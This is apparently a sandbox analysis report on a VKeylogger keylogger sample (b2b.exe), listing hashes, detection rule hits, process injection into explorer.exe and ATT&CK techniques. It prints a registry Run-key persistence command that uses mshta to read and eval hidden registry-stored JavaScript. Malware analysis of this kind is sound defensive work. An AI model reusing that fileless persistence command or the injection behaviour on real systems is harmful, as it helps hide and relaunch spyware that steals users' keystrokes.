vkeylogger | 1e1323ed0904f242c894e5ea680bc1d7aa6cbe2edc667140240bf2c5d403c207

Analysis

max time kernel
61s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
05-09-2022 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b2b.exe
Size

74KB
MD5

0f31bf1d3d188a3778b78686447eb73d
SHA1

b51f1292a5a21e90b9cf1d9c2dbe7f3461fbc457
SHA256

1e1323ed0904f242c894e5ea680bc1d7aa6cbe2edc667140240bf2c5d403c207
SHA512

062dfb650e37e8b88cc983bd28e9b61e8292b619d471bbb737a16f7ac90a8dee4450c2704a20e65392a244e93c4b3e6c670f61b19f6cbb37f0681fd27c10be1f
SSDEEP

1536:N4W3Dr5u1s1Xrhja8ayrwmN3jP3Rmxz/CXSI0vb6YWoGYp3jye:53DrMCzzzfsuD0eGrTye

Score

10^/10

vkeylogger keylogger persistence stealer

Malware Config

Signatures

VKeylogger
A keylogger first seen in Nov 2020.
stealer keylogger vkeylogger

VKeylogger payload 2 IoCs

resource	yara_rule
behavioral2/memory/3932-133-0x0000000000DA0000-0x0000000000DB3000-memory.dmp	family_vkeylogger
behavioral2/memory/3932-134-0x0000000000DA0000-0x0000000000DB3000-memory.dmp	family_vkeylogger

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mfoedmf = "C:\\Users\\Admin\\AppData\\Local\\Temp\\b2b.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ghtrh = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);"	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1584 set thread context of 3932	1584	b2b.exe	83

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1584	b2b.exe
3932	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3932	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3932	explorer.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1584 wrote to memory of 3932	1584	b2b.exe	83
PID 1584 wrote to memory of 3932	1584	b2b.exe	83
PID 1584 wrote to memory of 3932	1584	b2b.exe	83

C:\Users\Admin\AppData\Local\Temp\b2b.exe
"C:\Users\Admin\AppData\Local\Temp\b2b.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1584
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3932-133-0x0000000000DA0000-0x0000000000DB3000-memory.dmp

Filesize
76KB

Download
memory/3932-134-0x0000000000DA0000-0x0000000000DB3000-memory.dmp

Filesize
76KB

Download